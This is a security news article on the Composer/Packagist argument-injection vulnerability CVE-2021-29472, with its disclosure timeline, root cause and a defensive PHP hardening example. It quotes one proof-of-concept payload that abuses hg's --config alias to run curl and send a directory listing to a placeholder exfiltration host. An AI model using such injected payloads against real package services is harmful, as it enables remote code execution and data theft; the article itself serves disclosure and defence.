Vulnerability in the Composer package manager that allowed compromise of the Packagist PHP repository

A critical vulnerability (CVE-2021-29472) has been identified in the Composer dependency manager that allows arbitrary commands to be executed on the system when processing a package with a specially crafted URL value that specifies the address from which source code is downloaded. The problem manifests in the GitDriver, SvnDriver and HgDriver components used with the Git, Subversion and Mercurial source control systems. The vulnerability was fixed in Composer releases 1.10.22 and 2.0.13.

It is noted in particular that the problem mainly affected Composer's default package repository, Packagist, which holds 306 packages for PHP developers and serves more than 1.4 billion downloads per month. The experiment showed that, had the problem been known, attackers could have gained control of the Packagist infrastructure and intercepted maintainers' credentials, or redirected package downloads to a third-party server and arranged delivery of package variants with malicious changes to install a backdoor during the dependency installation process.

The danger to end users is limited by the fact that the contents of composer.json are usually determined by the user, and the links are passed when accessing third-party repositories, which are generally trusted. The main blow fell on the Packagist.org repository and the Private Packagist service, which invoke Composer with data received from users. Attackers could execute their code on the Packagist servers by publishing a specially crafted package.

The Packagist team fixed the vulnerability within 12 hours of being notified. Researchers privately notified the Packagist developers on April 22, and the problem was fixed the same day. A public update to Composer addressing the vulnerability was released on April 27, with details disclosed on April 28. An audit of the logs on the Packagist servers revealed no suspicious activity related to the vulnerability.

The problem is caused by a bug in the URL validation code for the root composer.json file and for the source download links. The bug has been present in the codebase since November 2011. Packagist uses special layers to run version control commands without being tied to a specific VCS; these are executed by calling "fromShellCommandline" and passing the arguments as a command line. For example, for git, the command "git ls-remote --heads $URL" is called, where the URL is processed with the "ProcessExecutor::escape($url)" method, which escapes potentially dangerous constructs such as "$(...)" or "`...`".

The root of the problem is that the ProcessExecutor::escape method did not escape the "-" character, which allowed an additional call parameter to be specified in the URL. Such escaping was missing in the GitDriver.php, SvnDriver.php and HgDriver.php drivers. Attacking GitDriver.php was hindered by the fact that the "git ls-remote" command does not support specifying additional arguments after the path. Attacking HgDriver.php became possible by passing the "--config" parameter to the "hg" utility, which allows execution of an arbitrary command to be arranged by manipulating the "alias.identify" setting. For example, to download and run code with the curl utility, one could specify: --config=alias.identify=!curl http://exfiltration-host.tld --data "$(ls -alh)"
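As an added illustration (not Composer's code; the function names are hypothetical), the PHP below shows the pattern the advisory describes: shell-escaping alone leaves a value that starts with "-" intact for the VCS binary to read as an option, while a scheme check plus an end-of-options "--" separator (assumed to be honoured by the binary, as git's option parser does) keeps the URL positional.

```php
<?php
// Added example, not Composer's own code. Function names are hypothetical.
// Shows why ProcessExecutor::escape-style quoting alone did not stop
// CVE-2021-29472: a quoted value that starts with "-" still reaches the
// VCS binary as an option rather than as a repository URL.

// Naive form: quoting neutralises $(...) and `...`, nothing more.
function buildLsRemoteNaive(string $url): string
{
    return 'git ls-remote --heads ' . escapeshellarg($url);
}

// Defensive form: refuse option-looking values, require a known scheme,
// and terminate option parsing with "--" so the URL is always positional
// (assumes the VCS binary honours "--", as git's option parser does).
// The scheme list is deliberately narrower than Composer's real URL handling.
function assertSafeRepositoryUrl(string $url): void
{
    if ($url === '' || $url[0] === '-') {
        throw new InvalidArgumentException("URL must not start with '-': $url");
    }
    if (!preg_match('{^(https?|ssh|git)://[^\s]+$}i', $url)) {
        throw new InvalidArgumentException("Unsupported repository URL: $url");
    }
}

function buildLsRemoteHardened(string $url): string
{
    assertSafeRepositoryUrl($url);
    return 'git ls-remote --heads -- ' . escapeshellarg($url);
}

// Constructed sample inputs: a benign URL and an injected option.
$samples = [
    'https://example.invalid/vendor/package.git',
    '--version',
];
foreach ($samples as $url) {
    echo 'naive:    ' . buildLsRemoteNaive($url) . PHP_EOL;
    try {
        echo 'hardened: ' . buildLsRemoteHardened($url) . PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'hardened: rejected (' . $e->getMessage() . ')' . PHP_EOL;
    }
}
```

For the second sample the naive line becomes `git ls-remote --heads '--version'`; the shell strips the quotes, so git receives `--version` as an option, which is exactly the class of injection the drivers were exposed to.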

By publishing a test package with a similar URL to Packagist, the researchers confirmed that, after publication, their server received an HTTP request from one of the Packagist servers in AWS containing a listing of the files in the current directory.

Source: opennet.ru
